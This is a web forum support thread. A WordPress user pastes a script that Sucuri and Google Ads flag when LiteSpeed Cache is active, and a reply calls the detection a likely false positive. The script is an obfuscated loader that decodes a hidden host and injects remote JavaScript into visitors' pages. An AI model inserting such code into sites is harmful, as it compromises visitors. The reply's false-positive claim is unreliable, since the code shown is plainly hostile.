google ads, and sucuri detect mallware when i activate litespeed

#1
when i activate litespeed cache google ads detects mallware and blocks my ads, sucuri also sees malware, below is the code that sucuri sees as mallware, if i deactivate litespeed cache all is normal



!function(e,t){var r=Math.floor(Date.now()/1e3),n=r-r%3600;if(r-=r%600,r=r.toString(16),!document.referrer)return;let a=atob("anMub3B0dHJh" + "Y2tlci5vbmxpbmU=");(t=e.createElement("script")).type="text/javascript",t.async=!0,t.src="https://"+a+"/event.min."+n+".js?v="+r,e.getElementsByTagName("head")[0].appendChild(t)}(document);
 

Attachments

serpent_driver

Well-Known Member
#2
The LiteSpeed cache plugin does not add Javascript to your code, but only combines and compresses the existing JS files if you have activated the corresponding function. If your JS files actually contain malicious code, then you need to check the original JS files. However, there is a strong suspicion that this is a false positive test result.

If you have any further questions, please use the LiteSpeed Support Forum on WordPress. This forum no longer supports the cache plugin.

https://www.litespeedtech.com/support/forum/threads/please-use-the-official-wordpress-forum.16028/
 
Top